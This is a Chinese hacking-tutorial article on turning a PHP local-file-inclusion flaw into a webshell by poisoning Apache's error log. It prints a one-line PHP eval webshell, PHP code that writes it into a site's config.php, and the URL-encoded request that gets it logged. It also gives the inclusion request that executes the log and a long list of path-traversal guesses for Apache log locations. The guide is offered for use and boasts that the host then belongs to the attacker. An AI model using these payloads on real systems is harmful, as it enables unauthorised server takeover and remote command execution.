WAP手机版 RSS订阅 加入收藏  设为首页
黑客技术
当前位置:首页 > 黑客技术

php包含apache日志写马

时间:2019/7/8 17:09:38   作者:安琪   来源:www.hack361.com   阅读:0   评论:0
内容摘要:这句一句话木马<?eval($_POST[cmd]);?>到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>...

这句一句话木马 
<?eval($_POST[cmd]);?>   

到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, 

fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,
然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是 

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>"); 
fclose($fp);?>   //在config.php里写入一句木马语句 

我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。 

提交 

http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww 
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp 
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B 
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E 

这样就错误日志里就记录下了这行写入webshell的代码
 
我们再来包含日志,提交 
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log 

这样webshell就写入成功了,config.php里就写入一句木马语句 
OK. 
http://www.xxx.com/forum/config.php这个就成了我们的webshell 
直接用lanker的客户端一连,主机就是你的了。 


PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用 

其他的日志路径,你可以去猜,也可以参照这里。 
../../../../../../../../../../var/log/httpd/access_log 
../../../../../../../../../../var/log/httpd/error_log 
../apache/logs/error.log 
../apache/logs/access.log 
../../apache/logs/error.log 
../../apache/logs/access.log 
../../../apache/logs/error.log 
../../../apache/logs/access.log 
../../../../../../../../../../etc/httpd/logs/acces_log 
../../../../../../../../../../etc/httpd/logs/acces.log 
../../../../../../../../../../etc/httpd/logs/error_log 
../../../../../../../../../../etc/httpd/logs/error.log 
../../../../../../../../../../var/www/logs/access_log 
../../../../../../../../../../var/www/logs/access.log 
../../../../../../../../../../usr/local/apache/logs/access_log 
../../../../../../../../../../usr/local/apache/logs/access.log 
../../../../../../../../../../var/log/apache/access_log 
../../../../../../../../../../var/log/apache/access.log 
../../../../../../../../../../var/log/access_log 
../../../../../../../../../../var/www/logs/error_log 
../../../../../../../../../../var/www/logs/error.log 
../../../../../../../../../../usr/local/apache/logs/error_log 
../../../../../../../../../../usr/local/apache/logs/error.log 
../../../../../../../../../../var/log/apache/error_log 
../../../../../../../../../../var/log/apache/error.log 
../../../../../../../../../../var/log/access_log 
../../../../../../../../../../var/log/error_log 
/var/log/httpd/access_log       
/var/log/httpd/error_log     
../apache/logs/error.log     
../apache/logs/access.log 
../../apache/logs/error.log 
../../apache/logs/access.log 
../../../apache/logs/error.log 
../../../apache/logs/access.log 
/etc/httpd/logs/acces_log 
/etc/httpd/logs/acces.log 
/etc/httpd/logs/error_log 
/etc/httpd/logs/error.log 
/var/www/logs/access_log 
/var/www/logs/access.log 
/usr/local/apache/logs/access_log 
/usr/local/apache/logs/access.log 
/var/log/apache/access_log 
/var/log/apache/access.log 
/var/log/access_log 
/var/www/logs/error_log 
/var/www/logs/error.log 
/usr/local/apache/logs/error_log 
/usr/local/apache/logs/error.log 
/var/log/apache/error_log 
/var/log/apache/error.log 
/var/log/access_log 
/var/log/error_log

标签:php包含apache日志 
相关评论

本类更新

本类推荐

本类排行

本站资源来自互联网收集 仅供用于学习和交流 请遵循相关法律法规 本站一切资源不代表本站立场

Copyright 2018 黑客361 www.hack361.com All Rights Reserved 

站长QQ1437232096

技术交流群99802923